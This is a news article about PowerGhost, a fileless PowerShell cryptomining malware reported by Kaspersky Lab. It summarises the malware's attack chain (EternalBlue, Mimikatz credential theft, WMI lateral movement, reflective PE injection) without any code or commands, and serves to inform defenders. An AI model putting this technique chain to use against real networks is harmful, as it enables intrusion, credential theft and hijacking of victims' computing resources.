Cyber-criminals have created a newly discovered PowerShell-based malware program that spreads cryptomining software across infected businesses' local area networks using various fileless techniques, including the EternalBlue exploit.
Dubbed PowerGhost, the malware "is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers," warns a 26 July blog post from Kaspersky Lab, whose researchers uncovered the threat.
According to post co-authors and researchers Vladas Bulavas and Anatoly Kazantsev, the actors behind this campaign use exploits or remote administration tools to initially infect targets with the obfuscated, single-line PowerShell script. At that point, the script immediately downloads and executes the miner without writing it to the hard drive, launching the software by loading a PE file via reflective PE injection.
The modular PowerGhost script propagates itself across networks by leveraging the EternalBlue remote code execution exploit, as well as by using the password extraction tool Mimikatz tool to grab user account credentials from infected machines. These credentials are then used to log on to additional machines before the script launches a copy of itself via WMI (Windows Management instrumentation).
When it does successfully land on a new network machine, PowerGhost next tries to escalate its privileges using multiple Microsoft Windows exploits.
So far PowerGhost sightings have been most frequent in India, Brazil, Columbia and Turkey, reports Kaspersky, whose researchers even found one version of the script that included a DDoS tool component.